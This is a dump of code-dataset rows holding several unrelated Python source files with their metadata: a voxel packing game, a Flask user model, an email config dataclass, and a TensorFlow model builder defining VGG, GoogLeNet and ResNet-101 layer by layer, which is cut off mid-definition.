while not g.getGameEnded(b):
valid_actions = g.getValidMoves(b)
if valid_actions[-1] == 1:
print("NO MORE VALID ACTIONS")
break
valid_action_idx = np.where(valid_actions==1)[0]
rand_action = random.choice(valid_action_idx)
rand_action_onehot = np.zeros(len(valid_actions))
rand_action_onehot[rand_action] = 1
rand_action_onehot_flipped = g.flip_pi_LR(flipped_b, rand_action_onehot)
rand_action_flipped = np.where(rand_action_onehot_flipped==1)[0][0]
b_renderer.draw_action(b, rand_action)
b_renderer2.draw_action(flipped_b, rand_action_flipped)
b_renderer.show(1)
b = g.getNextState(b, rand_action)
flipped_b = g.getNextState(flipped_b, rand_action_flipped)
b_renderer.display_board(b)
b_renderer2.display_board(flipped_b)
b_renderer.show(1)
print("Occupied cells: %d of available %d, Score: %.3f"%(b.get_occupied_count(), min(b.box_list_area, x * y * z), b.get_score())) | from __future__ import print_function
import sys
sys.path.append('..')
# from Game import Game
# from .TetrisLogic import Board, BoardRenderer
from VoxelLogic import Board
import numpy as np
import random
class VoxelGame(object):
def __init__(self,x,y,z,n):
self.x = x
self.y = y
self.z = z
self.n = n
self.board = Board(x,y,z,n)
def getInitBoard(self):
# return initial board (numpy board)
self.board.reset()
return self.board
def getBoardSize(self):
return (self.board.len_z, self.board.len_y, self.board.len_x)
def getActionSize(self):
# return number of actions
# return self.n*self.n + 1
# box_list_cnt = len(getInitBoxList())
# board_sz = np.size(getInitBoard())
# return board_sz * box_list_cnt + 1
return self.board.total_actions + 1 # + 1 for end game action
def boardIndexToSquare(self, idx):
return self.board.boardIndexToSquare(idx)
def getNextState(self, board_obj, action):
# if player takes action on board, return next (board,player)
# action must be a valid move
if action == self.getActionSize():
return board_obj
b = board_obj
b.execute_move(action)
return b
def getValidMoves(self, board_obj):
# return a fixed size binary vector
valids = [0] * self.getActionSize()
b = board_obj
legalMoves = b.get_legal_moves_all()
if len(legalMoves)==0:
valids[-1]=1
else:
for ix in legalMoves:
valids[ix]=1
return np.array(valids)
def getGameEnded(self, board_obj):
# return 0 if not ended, 1 if player 1 won, -1 if player 1 lost
# player = 1
return not board_obj.has_legal_moves_all()
def getScore(self, board_obj):
return board_obj.get_score()
def getCanonicalForm(self, board_obj):
# return state if player==1, else return -state if player==-1
return board_obj
def getSymmetries(self, board_obj, pi):
'''
pi is the policy output (size: total actions)
'''
# horizontal flip only
assert(len(pi) == self.getActionSize()) # 1 for pass
l = []
# for i in range(1, 5):
b = board_obj
board = board_obj.pieces
for j in [True, False]:
newB = board.copy() # np.rot90(board, i)
if j:
newB[:b.z] = np.array([np.fliplr(x) for x in b.pieces[:b.z]]) # only flip the top part!
newPi = self.flip_pi_LR(board_obj, pi)
newPi = list(newPi) + [pi[-1]]
else:
newPi = list(pi)
l += [(newB, newPi)]
return l
def flip_pi_LR(self, board_obj, pi):
b = board_obj
n = b.n
x = b.x
y = b.y
z = b.z
total_actions = b.total_actions
assert len(pi) >= total_actions == x * y * z * n
newPi_m = np.reshape(np.array(pi)[:total_actions], (n, z, y, x))
for box_ix, mask in enumerate(newPi_m):
# newPi = np.array([np.fliplr(pi_) for pi_ in newPi]) # CHECK IT!
box_w,_,_ = b.get_box_size_from_idx(box_ix)
if box_w == 0:
continue
mask = np.array([np.fliplr(m) for m in mask])
shift_x = box_w - 1 # shift to the left
mask[:,:,:x-shift_x] = mask[:,:,shift_x:]
mask[:,:,x-shift_x:] = 0
newPi_m[box_ix] = mask
return newPi_m.ravel()
def stringRepresentation(self, board_obj):
# 8x8 numpy array (canonical board)
return board_obj.pieces.tostring()
if __name__ == '__main__':
import copy
n = 5
x = 6
y = 4
z = 3
b = Board(x, y, z, n)
g = VoxelGame(x, y, z, n)
from VoxelRender import BoardRenderer
b_renderer = BoardRenderer(name='Normal')
b_renderer2 = BoardRenderer(name='Flipped')
flipped_b = copy.deepcopy(b)
while not g.getGameEnded(b):
valid_actions = g.getValidMoves(b)
if valid_actions[-1] == 1:
print("NO MORE VALID ACTIONS")
break
valid_action_idx = np.where(valid_actions==1)[0]
rand_action = random.choice(valid_action_idx)
rand_action_onehot = np.zeros(len(valid_actions))
rand_action_onehot[rand_action] = 1
rand_action_onehot_flipped = g.flip_pi_LR(flipped_b, rand_action_onehot)
rand_action_flipped = np.where(rand_action_onehot_flipped==1)[0][0]
b_renderer.draw_action(b, rand_action)
b_renderer2.draw_action(flipped_b, rand_action_flipped)
b_renderer.show(1)
b = g.getNextState(b, rand_action)
flipped_b = g.getNextState(flipped_b, rand_action_flipped)
b_renderer.display_board(b)
b_renderer2.display_board(flipped_b)
b_renderer.show(1)
print("Occupied cells: %d of available %d, Score: %.3f"%(b.get_occupied_count(), min(b.box_list_area, x * y * z), b.get_score())) | en | 0.563373 | # from Game import Game # from .TetrisLogic import Board, BoardRenderer # return initial board (numpy board) # return number of actions # return self.n*self.n + 1 # box_list_cnt = len(getInitBoxList()) # board_sz = np.size(getInitBoard()) # return board_sz * box_list_cnt + 1 # + 1 for end game action # if player takes action on board, return next (board,player) # action must be a valid move # return a fixed size binary vector # return 0 if not ended, 1 if player 1 won, -1 if player 1 lost # player = 1 # return state if player==1, else return -state if player==-1 pi is the policy output (size: total actions) # horizontal flip only # 1 for pass # for i in range(1, 5): # np.rot90(board, i) # only flip the top part! # newPi = np.array([np.fliplr(pi_) for pi_ in newPi]) # CHECK IT! # shift to the left # 8x8 numpy array (canonical board) | 2.85666 | 3 |
declare_qtquick/properties/__ext__.py | likianta/declare-qtquick | 3 | 6616770 | <filename>declare_qtquick/properties/__ext__.py<gh_stars>1-10
try:
from ..black_magic import proxy
from ..control import PropGetterAndSetter
from ..control import get_id_level
from ..typehint import TsProperty as T # noqa
except ImportError as e:
raise e
| <filename>declare_qtquick/properties/__ext__.py<gh_stars>1-10
try:
from ..black_magic import proxy
from ..control import PropGetterAndSetter
from ..control import get_id_level
from ..typehint import TsProperty as T # noqa
except ImportError as e:
raise e
| none | 1 | 1.093053 | 1 | |
auctioning_platform/customer_relationship/customer_relationship/config.py | nhdinh/smp-modulith | 299 | 6616771 | from dataclasses import dataclass
from typing import Tuple
@dataclass(repr=False)
class CustomerRelationshipConfig:
email_host: str
email_port: int
email_username: str
email_password: str
email_from: Tuple[str, str]
@property
def formatted_from(self) -> str:
return f"{self.email_from[0]} <{self.email_from[1]}>"
| from dataclasses import dataclass
from typing import Tuple
@dataclass(repr=False)
class CustomerRelationshipConfig:
email_host: str
email_port: int
email_username: str
email_password: str
email_from: Tuple[str, str]
@property
def formatted_from(self) -> str:
return f"{self.email_from[0]} <{self.email_from[1]}>"
| none | 1 | 3.281964 | 3 | |
flask_tutorial_03/models/user.py | lishnih/flask_tutorial_03 | 0 | 6616772 | #!/usr/bin/env python
# coding=utf-8
# Stan 2016-06-07
from __future__ import (division, absolute_import,
print_function, unicode_literals)
import os
from datetime import datetime
from ..app import app, db, bcrypt
class User(db.Model): # Rev. 2018-10-21
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String, nullable=False, unique=True)
email = db.Column(db.String, nullable=False, unique=True)
name = db.Column(db.String, nullable=False)
password = db.Column(db.String, nullable=False)
active = db.Column(db.Boolean, nullable=False, default=True)
verified = db.Column(db.String, nullable=False)
created = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
updated = db.Column(db.DateTime, nullable=False, default=datetime.utcnow, onupdate=datetime.utcnow)
@property
def is_anonymous(self):
return False
@property
def is_authenticated(self):
return True
@property
def is_active(self):
return self.active
@property
def is_verified(self):
return not self.verified
def __init__(self, username, email, password=None, **kargs):
self.username = username
self.email = email
self.password = self.get_password(password) if password else '-'
for key, value in kargs.items():
if hasattr(self, key):
setattr(self, key, value)
self.verified = self.get_verification(password)
def __repr__(self):
return '<User {0!r}>'.format(self.name)
def get_id(self):
return self.email
def get_password(self, password):
pw_hash = bcrypt.generate_password_hash(password)
return pw_hash
def change_password(self, password):
self.password = self.get_password(password)
def init_env(self, send=True):
if send:
self.send_verification()
else:
self.set_verified()
def send_verification(self):
# send verification code
pass
def get_verification(self, data):
double = True
while double:
verified = bcrypt.generate_password_hash(data)
double = User.query.filter_by(verified=verified).first()
return verified
def set_verified(self):
self.verified = ''
def set_active(self, status = 1):
self.active = status
db.create_all()
| #!/usr/bin/env python
# coding=utf-8
# Stan 2016-06-07
from __future__ import (division, absolute_import,
print_function, unicode_literals)
import os
from datetime import datetime
from ..app import app, db, bcrypt
class User(db.Model): # Rev. 2018-10-21
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String, nullable=False, unique=True)
email = db.Column(db.String, nullable=False, unique=True)
name = db.Column(db.String, nullable=False)
password = db.Column(db.String, nullable=False)
active = db.Column(db.Boolean, nullable=False, default=True)
verified = db.Column(db.String, nullable=False)
created = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
updated = db.Column(db.DateTime, nullable=False, default=datetime.utcnow, onupdate=datetime.utcnow)
@property
def is_anonymous(self):
return False
@property
def is_authenticated(self):
return True
@property
def is_active(self):
return self.active
@property
def is_verified(self):
return not self.verified
def __init__(self, username, email, password=None, **kargs):
self.username = username
self.email = email
self.password = self.get_password(password) if password else '-'
for key, value in kargs.items():
if hasattr(self, key):
setattr(self, key, value)
self.verified = self.get_verification(password)
def __repr__(self):
return '<User {0!r}>'.format(self.name)
def get_id(self):
return self.email
def get_password(self, password):
pw_hash = bcrypt.generate_password_hash(password)
return pw_hash
def change_password(self, password):
self.password = self.get_password(password)
def init_env(self, send=True):
if send:
self.send_verification()
else:
self.set_verified()
def send_verification(self):
# send verification code
pass
def get_verification(self, data):
double = True
while double:
verified = bcrypt.generate_password_hash(data)
double = User.query.filter_by(verified=verified).first()
return verified
def set_verified(self):
self.verified = ''
def set_active(self, status = 1):
self.active = status
db.create_all()
| en | 0.527877 | #!/usr/bin/env python # coding=utf-8 # Stan 2016-06-07 # Rev. 2018-10-21 # send verification code | 2.464154 | 2 |
model_builder.py | TDteach/benchmarks | 0 | 6616773 | import tensorflow as tf
from models import model as model_lib
from tensorflow.python.training import moving_averages
import convnet_builder
from six.moves import xrange
import numpy as np
def load_weights(weight_file):
print('===Load===')
print('has loaded caffe_weight_file %s' % weight_file)
if weight_file is None:
return
try:
weights_dict = np.load(weight_file).item()
except:
weights_dict = np.load(weight_file, encoding='bytes').item()
return weights_dict
class Model_Builder(model_lib.CNNModel):
def __init__(self, model_name, num_class, options, params):
super(Model_Builder, self).__init__(model_name,
image_size=options.crop_size,
batch_size=options.batch_size,
learning_rate=options.base_lr,
params=params)
self.options = options
self.num_class = num_class
if model_name == 'resnet101':
self.__weights_dict = load_weights(options.caffe_model_path)
elif model_name == 'cifar10':
from models import resnet_model
self._resnet20 = resnet_model.create_resnet20_cifar_model(params)
elif model_name == 'cifar10_alexnet':
from models import alexnet_model
self._alexnet = alexnet_model.AlexnetCifar10Model()
elif model_name == 'resnet50':
from models import resnet_model
self._resnet50 = resnet_model.create_resnet50_model(params)
elif 'resnet101' in model_name:
from models import resnet_model
self._resnet101 = resnet_model.create_resnet101_model(params)
elif options.net_mode == 'backdoor_eva':
self.mu, self.inv_Sigma = self._read_gaussian_data(self.options.gaussian_data_file)
self.trainable = True
self.last_affine_name = None
self.backbone_savers=[]
def _read_gaussian_data(self, file_name):
from scipy.io import loadmat
in_list = loadmat(file_name)
return in_list['mu'].astype(np.float32), in_list['inv_Sigma'].astype(np.float32)
def _variable_with_constant_value(self, name, value, trainable=None):
if trainable is None:
trainable = self.trainable
var = tf.get_variable(name, value.shape, dtype=tf.float32, initializer=tf.constant_initializer(value),
trainable=trainable)
return var
def _gtsrb_inference(self, cnn):
num_conv_layers = [2, 2, 2]
assert len(num_conv_layers) == 3
for _ in xrange(num_conv_layers[0]):
cnn.conv(32, 3, 3)
cnn.mpool(2, 2)
cnn.dropout(keep_prob=0.8)
for _ in xrange(num_conv_layers[1]):
cnn.conv(64, 3, 3)
cnn.mpool(2, 2)
cnn.dropout(keep_prob=0.8)
for _ in xrange(num_conv_layers[2]):
cnn.conv(128, 3, 3)
cnn.mpool(2, 2)
cnn.dropout(keep_prob=0.8)
cnn.reshape([-1, 128 * 4 * 4])
cnn.affine(256)
cnn.dropout(keep_prob=0.5)
def _vgg16_inference(self, cnn):
num_conv_layers = [2, 2, 3, 3, 3]
"""Build vgg architecture from blocks."""
assert len(num_conv_layers) == 5
for _ in xrange(num_conv_layers[0]):
cnn.conv(64, 3, 3)
cnn.mpool(2, 2)
for _ in xrange(num_conv_layers[1]):
cnn.conv(128, 3, 3)
cnn.mpool(2, 2)
for _ in xrange(num_conv_layers[2]):
cnn.conv(256, 3, 3)
cnn.mpool(2, 2)
for _ in xrange(num_conv_layers[3]):
cnn.conv(512, 3, 3)
cnn.mpool(2, 2)
for _ in xrange(num_conv_layers[4]):
cnn.conv(512, 3, 3)
cnn.mpool(2, 2)
cnn.reshape([-1, 512 * 4 * 4])
cnn.affine(4096)
cnn.dropout()
cnn.affine(256)
cnn.dropout()
def _googlenet_inference(self, cnn):
def inception_v1(cnn, k, l, m, n, p, q):
cols = [[('conv', k, 1, 1)], [('conv', l, 1, 1), ('conv', m, 3, 3)],
[('conv', n, 1, 1), ('conv', p, 5, 5)],
[('mpool', 3, 3, 1, 1, 'SAME'), ('conv', q, 1, 1)]]
cnn.inception_module('incept_v1', cols)
cnn.conv(64, 7, 7, 2, 2)
cnn.mpool(3, 3, 2, 2, mode='SAME')
cnn.conv(64, 1, 1)
cnn.conv(192, 3, 3)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 64, 96, 128, 16, 32, 32)
inception_v1(cnn, 128, 128, 192, 32, 96, 64)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 192, 96, 208, 16, 48, 64)
inception_v1(cnn, 160, 112, 224, 24, 64, 64)
inception_v1(cnn, 128, 128, 256, 24, 64, 64)
inception_v1(cnn, 112, 144, 288, 32, 64, 64)
inception_v1(cnn, 256, 160, 320, 32, 128, 128)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 256, 160, 320, 32, 128, 128)
inception_v1(cnn, 384, 192, 384, 48, 128, 128)
cnn.apool(4, 4, 1, 1, mode='VALID')
cnn.reshape([-1, 1024])
def _resnet101_inference(self, cnn):
conv1_pad = tf.pad(cnn.top_layer, paddings=[[0, 0], [3, 3], [3, 3], [0, 0]])
conv1 = self.convolution(conv1_pad, group=1, strides=[2, 2], padding='VALID', name='conv1')
bn_conv1 = self.batch_normalization(conv1, variance_epsilon=9.99999974738e-06, name='bn_conv1')
conv1_relu = tf.nn.relu(bn_conv1, name='conv1_relu')
pool1_pad = tf.pad(conv1_relu, paddings=[[0, 0], [0, 1], [0, 1], [0, 0]], constant_values=float('-Inf'))
pool1 = tf.nn.max_pool(pool1_pad, [1, 3, 3, 1], [1, 2, 2, 1], padding='VALID', name='pool1')
res2a_branch2a = self.convolution(pool1, group=1, strides=[1, 1], padding='VALID', name='res2a_branch2a')
res2a_branch1 = self.convolution(pool1, group=1, strides=[1, 1], padding='VALID', name='res2a_branch1')
bn2a_branch2a = self.batch_normalization(res2a_branch2a, variance_epsilon=9.99999974738e-06,
name='bn2a_branch2a')
bn2a_branch1 = self.batch_normalization(res2a_branch1, variance_epsilon=9.99999974738e-06, name='bn2a_branch1')
res2a_branch2a_relu = tf.nn.relu(bn2a_branch2a, name='res2a_branch2a_relu')
res2a_branch2b_pad = tf.pad(res2a_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res2a_branch2b = self.convolution(res2a_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res2a_branch2b')
bn2a_branch2b = self.batch_normalization(res2a_branch2b, variance_epsilon=9.99999974738e-06,
name='bn2a_branch2b')
res2a_branch2b_relu = tf.nn.relu(bn2a_branch2b, name='res2a_branch2b_relu')
res2a_branch2c = self.convolution(res2a_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res2a_branch2c')
bn2a_branch2c = self.batch_normalization(res2a_branch2c, variance_epsilon=9.99999974738e-06,
name='bn2a_branch2c')
res2a = bn2a_branch1 + bn2a_branch2c
res2a_relu = tf.nn.relu(res2a, name='res2a_relu')
res2b_branch2a = self.convolution(res2a_relu, group=1, strides=[1, 1], padding='VALID', name='res2b_branch2a')
bn2b_branch2a = self.batch_normalization(res2b_branch2a, variance_epsilon=9.99999974738e-06,
name='bn2b_branch2a')
res2b_branch2a_relu = tf.nn.relu(bn2b_branch2a, name='res2b_branch2a_relu')
res2b_branch2b_pad = tf.pad(res2b_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res2b_branch2b = self.convolution(res2b_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res2b_branch2b')
bn2b_branch2b = self.batch_normalization(res2b_branch2b, variance_epsilon=9.99999974738e-06,
name='bn2b_branch2b')
res2b_branch2b_relu = tf.nn.relu(bn2b_branch2b, name='res2b_branch2b_relu')
res2b_branch2c = self.convolution(res2b_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res2b_branch2c')
bn2b_branch2c = self.batch_normalization(res2b_branch2c, variance_epsilon=9.99999974738e-06,
name='bn2b_branch2c')
res2b = res2a_relu + bn2b_branch2c
res2b_relu = tf.nn.relu(res2b, name='res2b_relu')
res2c_branch2a = self.convolution(res2b_relu, group=1, strides=[1, 1], padding='VALID', name='res2c_branch2a')
bn2c_branch2a = self.batch_normalization(res2c_branch2a, variance_epsilon=9.99999974738e-06,
name='bn2c_branch2a')
res2c_branch2a_relu = tf.nn.relu(bn2c_branch2a, name='res2c_branch2a_relu')
res2c_branch2b_pad = tf.pad(res2c_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res2c_branch2b = self.convolution(res2c_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res2c_branch2b')
bn2c_branch2b = self.batch_normalization(res2c_branch2b, variance_epsilon=9.99999974738e-06,
name='bn2c_branch2b')
res2c_branch2b_relu = tf.nn.relu(bn2c_branch2b, name='res2c_branch2b_relu')
res2c_branch2c = self.convolution(res2c_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res2c_branch2c')
bn2c_branch2c = self.batch_normalization(res2c_branch2c, variance_epsilon=9.99999974738e-06,
name='bn2c_branch2c')
res2c = res2b_relu + bn2c_branch2c
res2c_relu = tf.nn.relu(res2c, name='res2c_relu')
res3a_branch1 = self.convolution(res2c_relu, group=1, strides=[2, 2], padding='VALID', name='res3a_branch1')
res3a_branch2a = self.convolution(res2c_relu, group=1, strides=[2, 2], padding='VALID', name='res3a_branch2a')
bn3a_branch1 = self.batch_normalization(res3a_branch1, variance_epsilon=9.99999974738e-06, name='bn3a_branch1')
bn3a_branch2a = self.batch_normalization(res3a_branch2a, variance_epsilon=9.99999974738e-06,
name='bn3a_branch2a')
res3a_branch2a_relu = tf.nn.relu(bn3a_branch2a, name='res3a_branch2a_relu')
res3a_branch2b_pad = tf.pad(res3a_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res3a_branch2b = self.convolution(res3a_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res3a_branch2b')
bn3a_branch2b = self.batch_normalization(res3a_branch2b, variance_epsilon=9.99999974738e-06,
name='bn3a_branch2b')
res3a_branch2b_relu = tf.nn.relu(bn3a_branch2b, name='res3a_branch2b_relu')
res3a_branch2c = self.convolution(res3a_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res3a_branch2c')
bn3a_branch2c = self.batch_normalization(res3a_branch2c, variance_epsilon=9.99999974738e-06,
name='bn3a_branch2c')
res3a = bn3a_branch1 + bn3a_branch2c
res3a_relu = tf.nn.relu(res3a, name='res3a_relu')
res3b1_branch2a = self.convolution(res3a_relu, group=1, strides=[1, 1], padding='VALID', name='res3b1_branch2a')
bn3b1_branch2a = self.batch_normalization(res3b1_branch2a, variance_epsilon=9.99999974738e-06,
name='bn3b1_branch2a')
res3b1_branch2a_relu = tf.nn.relu(bn3b1_branch2a, name='res3b1_branch2a_relu')
res3b1_branch2b_pad = tf.pad(res3b1_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res3b1_branch2b = self.convolution(res3b1_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res3b1_branch2b')
bn3b1_branch2b = self.batch_normalization(res3b1_branch2b, variance_epsilon=9.99999974738e-06,
name='bn3b1_branch2b')
res3b1_branch2b_relu = tf.nn.relu(bn3b1_branch2b, name='res3b1_branch2b_relu')
res3b1_branch2c = self.convolution(res3b1_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b1_branch2c')
bn3b1_branch2c = self.batch_normalization(res3b1_branch2c, variance_epsilon=9.99999974738e-06,
name='bn3b1_branch2c')
res3b1 = res3a_relu + bn3b1_branch2c
res3b1_relu = tf.nn.relu(res3b1, name='res3b1_relu')
res3b2_branch2a = self.convolution(res3b1_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b2_branch2a')
bn3b2_branch2a = self.batch_normalization(res3b2_branch2a, variance_epsilon=9.99999974738e-06,
name='bn3b2_branch2a')
res3b2_branch2a_relu = tf.nn.relu(bn3b2_branch2a, name='res3b2_branch2a_relu')
res3b2_branch2b_pad = tf.pad(res3b2_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res3b2_branch2b = self.convolution(res3b2_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res3b2_branch2b')
bn3b2_branch2b = self.batch_normalization(res3b2_branch2b, variance_epsilon=9.99999974738e-06,
name='bn3b2_branch2b')
res3b2_branch2b_relu = tf.nn.relu(bn3b2_branch2b, name='res3b2_branch2b_relu')
res3b2_branch2c = self.convolution(res3b2_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b2_branch2c')
bn3b2_branch2c = self.batch_normalization(res3b2_branch2c, variance_epsilon=9.99999974738e-06,
name='bn3b2_branch2c')
res3b2 = res3b1_relu + bn3b2_branch2c
res3b2_relu = tf.nn.relu(res3b2, name='res3b2_relu')
res3b3_branch2a = self.convolution(res3b2_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b3_branch2a')
bn3b3_branch2a = self.batch_normalization(res3b3_branch2a, variance_epsilon=9.99999974738e-06,
name='bn3b3_branch2a')
res3b3_branch2a_relu = tf.nn.relu(bn3b3_branch2a, name='res3b3_branch2a_relu')
res3b3_branch2b_pad = tf.pad(res3b3_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res3b3_branch2b = self.convolution(res3b3_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res3b3_branch2b')
bn3b3_branch2b = self.batch_normalization(res3b3_branch2b, variance_epsilon=9.99999974738e-06,
name='bn3b3_branch2b')
res3b3_branch2b_relu = tf.nn.relu(bn3b3_branch2b, name='res3b3_branch2b_relu')
res3b3_branch2c = self.convolution(res3b3_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b3_branch2c')
bn3b3_branch2c = self.batch_normalization(res3b3_branch2c, variance_epsilon=9.99999974738e-06,
name='bn3b3_branch2c')
res3b3 = res3b2_relu + bn3b3_branch2c
res3b3_relu = tf.nn.relu(res3b3, name='res3b3_relu')
res4a_branch1 = self.convolution(res3b3_relu, group=1, strides=[2, 2], padding='VALID', name='res4a_branch1')
res4a_branch2a = self.convolution(res3b3_relu, group=1, strides=[2, 2], padding='VALID', name='res4a_branch2a')
bn4a_branch1 = self.batch_normalization(res4a_branch1, variance_epsilon=9.99999974738e-06, name='bn4a_branch1')
bn4a_branch2a = self.batch_normalization(res4a_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4a_branch2a')
res4a_branch2a_relu = tf.nn.relu(bn4a_branch2a, name='res4a_branch2a_relu')
res4a_branch2b_pad = tf.pad(res4a_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4a_branch2b = self.convolution(res4a_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4a_branch2b')
bn4a_branch2b = self.batch_normalization(res4a_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4a_branch2b')
res4a_branch2b_relu = tf.nn.relu(bn4a_branch2b, name='res4a_branch2b_relu')
res4a_branch2c = self.convolution(res4a_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4a_branch2c')
bn4a_branch2c = self.batch_normalization(res4a_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4a_branch2c')
res4a = bn4a_branch1 + bn4a_branch2c
res4a_relu = tf.nn.relu(res4a, name='res4a_relu')
res4b1_branch2a = self.convolution(res4a_relu, group=1, strides=[1, 1], padding='VALID', name='res4b1_branch2a')
bn4b1_branch2a = self.batch_normalization(res4b1_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b1_branch2a')
res4b1_branch2a_relu = tf.nn.relu(bn4b1_branch2a, name='res4b1_branch2a_relu')
res4b1_branch2b_pad = tf.pad(res4b1_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b1_branch2b = self.convolution(res4b1_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b1_branch2b')
bn4b1_branch2b = self.batch_normalization(res4b1_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b1_branch2b')
res4b1_branch2b_relu = tf.nn.relu(bn4b1_branch2b, name='res4b1_branch2b_relu')
res4b1_branch2c = self.convolution(res4b1_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b1_branch2c')
bn4b1_branch2c = self.batch_normalization(res4b1_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b1_branch2c')
res4b1 = res4a_relu + bn4b1_branch2c
res4b1_relu = tf.nn.relu(res4b1, name='res4b1_relu')
res4b2_branch2a = self.convolution(res4b1_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b2_branch2a')
bn4b2_branch2a = self.batch_normalization(res4b2_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b2_branch2a')
res4b2_branch2a_relu = tf.nn.relu(bn4b2_branch2a, name='res4b2_branch2a_relu')
res4b2_branch2b_pad = tf.pad(res4b2_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b2_branch2b = self.convolution(res4b2_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b2_branch2b')
bn4b2_branch2b = self.batch_normalization(res4b2_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b2_branch2b')
res4b2_branch2b_relu = tf.nn.relu(bn4b2_branch2b, name='res4b2_branch2b_relu')
res4b2_branch2c = self.convolution(res4b2_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b2_branch2c')
bn4b2_branch2c = self.batch_normalization(res4b2_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b2_branch2c')
res4b2 = res4b1_relu + bn4b2_branch2c
res4b2_relu = tf.nn.relu(res4b2, name='res4b2_relu')
res4b3_branch2a = self.convolution(res4b2_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b3_branch2a')
bn4b3_branch2a = self.batch_normalization(res4b3_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b3_branch2a')
res4b3_branch2a_relu = tf.nn.relu(bn4b3_branch2a, name='res4b3_branch2a_relu')
res4b3_branch2b_pad = tf.pad(res4b3_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b3_branch2b = self.convolution(res4b3_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b3_branch2b')
bn4b3_branch2b = self.batch_normalization(res4b3_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b3_branch2b')
res4b3_branch2b_relu = tf.nn.relu(bn4b3_branch2b, name='res4b3_branch2b_relu')
res4b3_branch2c = self.convolution(res4b3_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b3_branch2c')
bn4b3_branch2c = self.batch_normalization(res4b3_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b3_branch2c')
res4b3 = res4b2_relu + bn4b3_branch2c
res4b3_relu = tf.nn.relu(res4b3, name='res4b3_relu')
res4b4_branch2a = self.convolution(res4b3_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b4_branch2a')
bn4b4_branch2a = self.batch_normalization(res4b4_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b4_branch2a')
res4b4_branch2a_relu = tf.nn.relu(bn4b4_branch2a, name='res4b4_branch2a_relu')
res4b4_branch2b_pad = tf.pad(res4b4_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b4_branch2b = self.convolution(res4b4_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b4_branch2b')
bn4b4_branch2b = self.batch_normalization(res4b4_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b4_branch2b')
res4b4_branch2b_relu = tf.nn.relu(bn4b4_branch2b, name='res4b4_branch2b_relu')
res4b4_branch2c = self.convolution(res4b4_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b4_branch2c')
bn4b4_branch2c = self.batch_normalization(res4b4_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b4_branch2c')
res4b4 = res4b3_relu + bn4b4_branch2c
res4b4_relu = tf.nn.relu(res4b4, name='res4b4_relu')
res4b5_branch2a = self.convolution(res4b4_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b5_branch2a')
bn4b5_branch2a = self.batch_normalization(res4b5_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b5_branch2a')
res4b5_branch2a_relu = tf.nn.relu(bn4b5_branch2a, name='res4b5_branch2a_relu')
res4b5_branch2b_pad = tf.pad(res4b5_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
